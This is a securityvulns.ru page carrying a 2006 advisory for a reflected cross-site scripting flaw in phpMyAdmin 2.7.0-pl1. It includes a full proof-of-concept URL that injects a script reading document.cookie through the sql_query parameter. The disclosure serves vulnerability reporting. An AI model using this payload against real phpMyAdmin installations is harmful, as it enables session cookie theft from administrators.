Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA19637] RateIt "rateit_id"
SQL Injection Vulnerability

  [SA19662] Web+Shop "storeid" Full Path Disclosure Weakness

  [SA19626] Aweb Scripts Seller Payment Bypass Security Issue

  TalentSoft Web+Shop Path Disclosure

From:kr4ch_(at)_web.de <kr4ch_(at)_web.de>
Date:14.04.2006
Subject:phpMyAdmin 2.7.0-pl1

App: phpMyAdmin 2.7.0-pl1
Advistory by: p0w3r
Exploit: /phpmyadmin/sql.php?lang=de-utf-
8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&
goto=tbl_properties_structure.php&back=tbl_properties_structure.
php&sql_query=[XSS]
Example: /phpmyadmin/sql.php?lang=de-utf-
8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&
goto=tbl_properties_structure.php&back=tbl_properties_structure.
php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(documen
t.cookie)%3C/script%3E'%60

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru